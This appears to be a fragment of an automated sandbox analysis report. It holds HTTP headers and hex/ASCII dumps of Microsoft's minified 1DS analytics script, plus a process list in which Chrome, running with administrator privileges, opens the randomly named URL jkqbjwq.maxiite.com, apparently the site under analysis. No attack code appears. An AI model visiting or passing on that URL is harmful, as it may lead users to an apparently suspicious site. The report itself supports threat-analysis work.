                                                                                                    Content-Length: 91802
                                                                                                    Connection: close
                                                                                                    Vary: Accept-Encoding
                                                                                                    Cache-Control: no-transform, public, max-age=1800, immutable
                                                                                                    Last-Modified: Mon, 01 Jul 2024 17:02:58 GMT
                                                                                                    ETag: 0x8DC99EFA85DE069
                                                                                                    x-ms-request-id: fbe37448-a01e-0068-58b9-4b460a000000
                                                                                                    x-ms-version: 2009-09-19
                                                                                                    x-ms-meta-jssdkver: 3.2.18
                                                                                                    x-ms-meta-jssdksrc: [cdn]/scripts/c/ms.shared.analytics.mectrl-3.2.18.gbl.min.js
                                                                                                    Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,x-ms-meta-jssdkver,x-ms-meta-jssdksrc,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    x-azure-ref: 20241223T174411Z-156796c549bd6fqzhC1EWRawn00000000yxg000000007g7e
                                                                                                    x-fd-int-roxy-purgeid: 0
                                                                                                    X-Cache-Info: L1_T2
                                                                                                    X-Cache: TCP_HIT
                                                                                                    Accept-Ranges: bytes
                                                                                                    2024-12-23 17:44:11 UTC15471INData Raw: 2f 2a 21 0a 20 2a 20 31 44 53 20 4a 53 20 53 44 4b 20 53 68 61 72 65 64 20 41 6e 61 6c 79 74 69 63 73 2c 20 33 2e 32 2e 31 38 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 4d 69 63 72 6f 73 6f 66 74 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 20 2a 20 28 4d 69 63 72 6f 73 6f 66 74 20 49 6e 74 65 72 6e 61 6c 20 4f 6e 6c 79 29 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 76 61 72 20 74 2c 72 3d 7b 7d 2c 69 3d 22 5f 5f 6d 73 24 6d 6f 64 5f 5f 22 2c 6f 3d 7b 7d 2c 61 3d 6f 2e 65 73 6d 5f 6d 73 5f 73 68 61 72 65 64 5f 61 6e 61 6c 79 74 69 63 73 5f 6d 65 63 74 72 6c 5f 33 5f 32 5f 31 38 3d 7b 7d 2c 75 3d 22 33 2e 32 2e 31 38 22 2c 63 3d 22 6f 6e 65 44 73 4d 65 43
                                                                                                    Data Ascii: /*! * 1DS JS SDK Shared Analytics, 3.2.18 * Copyright (c) Microsoft and contributors. All rights reserved. * (Microsoft Internal Only) */!function(e,n){var t,r={},i="__ms$mod__",o={},a=o.esm_ms_shared_analytics_mectrl_3_2_18={},u="3.2.18",c="oneDsMeC
                                                                                                    2024-12-23 17:44:11 UTC16384INData Raw: 7d 63 61 74 63 68 28 74 29 7b 7d 7d 7d 3b 72 65 74 75 72 6e 20 6f 7d 76 61 72 20 48 72 3d 22 74 6f 47 4d 54 53 74 72 69 6e 67 22 2c 6a 72 3d 22 74 6f 55 54 43 53 74 72 69 6e 67 22 2c 57 72 3d 22 63 6f 6f 6b 69 65 22 2c 58 72 3d 22 65 78 70 69 72 65 73 22 2c 47 72 3d 22 65 6e 61 62 6c 65 64 22 2c 51 72 3d 22 69 73 43 6f 6f 6b 69 65 55 73 65 44 69 73 61 62 6c 65 64 22 2c 4a 72 3d 22 64 69 73 61 62 6c 65 43 6f 6f 6b 69 65 73 55 73 61 67 65 22 2c 24 72 3d 22 5f 63 6b 4d 67 72 22 2c 5a 72 3d 6e 75 6c 6c 2c 59 72 3d 6e 75 6c 6c 2c 65 69 3d 6e 75 6c 6c 2c 6e 69 3d 24 74 28 29 2c 74 69 3d 7b 7d 2c 72 69 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 69 69 28 65 29 7b 72 65 74 75 72 6e 21 65 7c 7c 65 2e 69 73 45 6e 61 62 6c 65 64 28 29 7d 66 75 6e 63 74 69 6f 6e 20 6f 69
                                                                                                    Data Ascii: }catch(t){}}};return o}var Hr="toGMTString",jr="toUTCString",Wr="cookie",Xr="expires",Gr="enabled",Qr="isCookieUseDisabled",Jr="disableCookiesUsage",$r="_ckMgr",Zr=null,Yr=null,ei=null,ni=$t(),ti={},ri={};function ii(e){return!e||e.isEnabled()}function oi
                                                                                                    2024-12-23 17:44:12 UTC16384INData Raw: 43 6e 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 5b 6e 65 5d 7d 2c 70 2e 72 65 6c 65 61 73 65 51 75 65 75 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3b 67 26 26 30 3c 72 5b 6e 65 5d 26 26 28 65 3d 72 2c 72 3d 5b 5d 2c 69 65 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 79 28 29 5b 46 5d 28 65 29 7d 29 29 7d 2c 70 2e 70 6f 6c 6c 49 6e 74 65 72 6e 61 6c 4c 6f 67 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 50 3d 65 7c 7c 6e 75 6c 6c 2c 4e 3d 21 31 2c 41 26 26 28 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 41 29 2c 41 3d 6e 75 6c 6c 29 2c 68 28 21 30 29 7d 2c 70 5b 4b 65 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 4e 3d 21 30 2c 41 26 26 28 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 41 29 2c 41 3d 30 2c 66 28 29 29 7d
                                                                                                    Data Ascii: Cnt=function(){return r[ne]},p.releaseQueue=function(){var e;g&&0<r[ne]&&(e=r,r=[],ie(e,function(e){y()[F](e)}))},p.pollInternalLogs=function(e){return P=e||null,N=!1,A&&(clearInterval(A),A=null),h(!0)},p[Ke]=function(){N=!0,A&&(clearInterval(A),A=0,f())}
                                                                                                    2024-12-23 17:44:12 UTC16384INData Raw: 2c 7b 72 3a 63 2e 49 4f 53 2c 6f 73 3a 22 69 4f 53 22 7d 2c 7b 72 3a 63 2e 41 4e 44 52 4f 49 44 2c 6f 73 3a 22 41 6e 64 72 6f 69 64 22 7d 2c 7b 72 3a 63 2e 4c 49 4e 55 58 2c 6f 73 3a 22 4c 69 6e 75 78 22 7d 2c 7b 72 3a 63 2e 43 52 4f 53 2c 6f 73 3a 22 43 68 72 6f 6d 65 20 4f 53 22 7d 2c 7b 73 3a 22 78 31 31 22 2c 6f 73 3a 22 55 6e 69 78 22 7d 2c 7b 73 3a 22 62 6c 61 63 6b 62 65 72 72 79 22 2c 6f 73 3a 22 42 6c 61 63 6b 42 65 72 72 79 22 7d 2c 7b 73 3a 22 73 79 6d 62 69 61 6e 22 2c 6f 73 3a 22 53 79 6d 62 69 61 6e 22 7d 2c 7b 73 3a 22 6e 6f 6b 69 61 22 2c 6f 73 3a 22 4e 6f 6b 69 61 22 7d 2c 7b 72 3a 63 2e 4f 53 58 2c 6f 73 3a 22 4d 61 63 20 4f 53 20 58 22 7d 5d 3b 66 75 6e 63 74 69 6f 6e 20 7a 61 28 65 2c 6e 29 7b 6e 3d 65 2e 6d 61 74 63 68 28 52 65 67 45
                                                                                                    Data Ascii: ,{r:c.IOS,os:"iOS"},{r:c.ANDROID,os:"Android"},{r:c.LINUX,os:"Linux"},{r:c.CROS,os:"Chrome OS"},{s:"x11",os:"Unix"},{s:"blackberry",os:"BlackBerry"},{s:"symbian",os:"Symbian"},{s:"nokia",os:"Nokia"},{r:c.OSX,os:"Mac OS X"}];function za(e,n){n=e.match(RegE
                                                                                                    2024-12-23 17:44:12 UTC16384INData Raw: 2e 6c 65 6e 67 74 68 3b 69 66 28 31 3c 63 29 7b 66 6f 72 28 76 61 72 20 6f 3d 6f 26 26 6f 2e 73 6c 69 63 65 28 29 2c 73 3d 30 3b 73 3c 63 2d 31 3b 73 2b 2b 29 7b 76 61 72 20 6c 3d 75 5b 73 5d 2c 61 3d 61 5b 6c 5d 3d 61 5b 6c 5d 7c 7c 7b 7d 3b 72 2b 3d 22 2e 22 2b 6c 2c 6f 26 26 6f 2e 70 75 73 68 28 6c 29 7d 69 3d 75 5b 63 2d 31 5d 7d 7d 28 65 3d 76 26 26 28 28 74 3d 53 5b 65 3d 72 5d 29 3d 3d 3d 75 6e 64 65 66 69 6e 65 64 26 26 28 37 3c 3d 65 2e 6c 65 6e 67 74 68 26 26 28 74 3d 61 74 28 65 2c 22 65 78 74 2e 6d 65 74 61 64 61 74 61 22 29 7c 7c 61 74 28 65 2c 22 65 78 74 2e 77 65 62 22 29 29 2c 53 5b 65 5d 3d 74 29 2c 74 29 7c 7c 21 62 7c 7c 21 62 2e 68 61 6e 64 6c 65 46 69 65 6c 64 28 72 2c 69 29 3f 66 75 6e 63 74 69 6f 6e 28 65 2c 6e 29 7b 69 66 28 21 65
                                                                                                    Data Ascii: .length;if(1<c){for(var o=o&&o.slice(),s=0;s<c-1;s++){var l=u[s],a=a[l]=a[l]||{};r+="."+l,o&&o.push(l)}i=u[c-1]}}(e=v&&((t=S[e=r])===undefined&&(7<=e.length&&(t=at(e,"ext.metadata")||at(e,"ext.web")),S[e]=t),t)||!b||!b.handleField(r,i)?function(e,n){if(!e
                                                                                                    2024-12-23 17:44:12 UTC10795INData Raw: 52 65 61 73 6f 6e 3a 6e 7d 7d 2c 21 74 29 3a 28 51 3d 30 3c 3d 51 3f 4d 61 74 68 2e 6d 69 6e 28 51 2c 72 29 3a 72 2c 6b 3d 4d 61 74 68 2e 6d 61 78 28 6b 2c 6e 29 29 2c 69 7d 66 75 6e 63 74 69 6f 6e 20 6e 28 29 7b 71 3d 7b 52 45 41 4c 5f 54 49 4d 45 3a 5b 32 2c 31 2c 30 5d 2c 4e 45 41 52 5f 52 45 41 4c 5f 54 49 4d 45 3a 5b 36 2c 33 2c 30 5d 2c 42 45 53 54 5f 45 46 46 4f 52 54 3a 5b 31 38 2c 39 2c 30 5d 7d 7d 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 6e 29 7b 76 61 72 20 74 3d 5b 5d 2c 72 3d 24 3f 59 3a 5a 3b 69 65 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 26 26 30 3c 65 2e 63 6f 75 6e 74 28 29 26 26 69 65 28 65 2e 65 76 65 6e 74 73 28 29 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 26 26 28 65 2e 73 79 6e 63 26 26 28 65 2e 6c 61 74 65 6e 63 79 3d 34 2c 65
                                                                                                    Data Ascii: Reason:n}},!t):(Q=0<=Q?Math.min(Q,r):r,k=Math.max(k,n)),i}function n(){q={REAL_TIME:[2,1,0],NEAR_REAL_TIME:[6,3,0],BEST_EFFORT:[18,9,0]}}function e(e,n){var t=[],r=$?Y:Z;ie(e,function(e){e&&0<e.count()&&ie(e.events(),function(e){e&&(e.sync&&(e.latency=4,e


                                                                                                    Click to jump to process

                                                                                                    Click to jump to process

                                                                                                    Click to jump to process

                                                                                                    Target ID:0
                                                                                                    Start time:12:43:27
                                                                                                    Start date:23/12/2024
                                                                                                    Path:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                                                    Imagebase:0x13f570000
                                                                                                    File size:3'151'128 bytes
                                                                                                    MD5 hash:FFA2B8E17F645BCC20F0E0201FEF83ED
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:low
                                                                                                    Has exited:false

                                                                                                    Target ID:1
                                                                                                    Start time:12:43:28
                                                                                                    Start date:23/12/2024
                                                                                                    Path:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1456 --field-trial-handle=1248,i,18209298034698684818,12563364091482857980,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                    Imagebase:0x13f570000
                                                                                                    File size:3'151'128 bytes
                                                                                                    MD5 hash:FFA2B8E17F645BCC20F0E0201FEF83ED
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:low
                                                                                                    Has exited:false

                                                                                                    Target ID:4
                                                                                                    Start time:12:43:35
                                                                                                    Start date:23/12/2024
                                                                                                    Path:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                                                    Wow64 process (32bit):false
                                                                                                    Commandline:"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" "https://jkqbjwq.maxiite.com"
                                                                                                    Imagebase:0x13f570000
                                                                                                    File size:3'151'128 bytes
                                                                                                    MD5 hash:FFA2B8E17F645BCC20F0E0201FEF83ED
                                                                                                    Has elevated privileges:true
                                                                                                    Has administrator privileges:true
                                                                                                    Programmed in:C, C++ or other language
                                                                                                    Reputation:low
                                                                                                    Has exited:true

                                                                                                    No disassembly